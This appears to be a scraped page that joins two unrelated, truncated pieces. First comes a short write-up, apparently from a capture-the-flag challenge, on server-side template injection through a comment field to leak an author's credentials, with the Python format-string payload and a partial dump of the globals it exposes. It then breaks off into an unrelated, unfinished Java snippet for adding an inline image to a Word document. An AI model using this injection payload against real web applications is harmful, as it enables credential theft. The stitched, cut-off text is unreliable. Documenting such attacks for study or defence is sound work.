stypr

SSTI

1. Write one comment
2. When writing a comment content, do SSTI to leak author's credentials

{rating[comments][0].__class__.__init__.__globals__}
{'__name__': 'app.loaddata', '__doc__': None, '__package__': 'app', '__loader__': <_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, '__spec__': ModuleSpec(name='app.loaddata', loader=<_frozen_importlib_external.SourceFileLoader object at 0x7fa912f51670>, origin='./app/loaddata.py'), '__file__': './app/loaddata.py', '__cached__': './app/__pycache__/loaddata.cpython-38.pyc', '__builtins__': {'__name__': 'builtins', '__doc__': "Built-in functions, exceptions, and other objects.\n\nNoteworthy: None is the `nil' object; Ellipsis represents `...' in slices.", '__package__': '', '__loader__': , '__spec__': ModuleSpec(name='builtins', loader=), '__build_class__': , '__import__': , 'abs': , 'all': , 'any': , 'ascii': , 'bin': , 'breakpoint': , 'callable': , 'chr': , 'compile': , 'delattr': , 'dir': , 'divmod': , 'eval': , 'exec': , 'format': 

Hunsu

public class AddingAnInlineImage {
    /**
     *  As is usual, we create a package to contain the document.
     *  Then we create a file that contains the image we want to add to the document.
     *  In order to be able to do something with this image, we'll have to convert
     *  it to an array of bytes. Finally we add the image to the package
     *  and save the package.
     */
    public static void main (String[] args) throws Exception {
        WordprocessingMLPackage  wordMLPackage =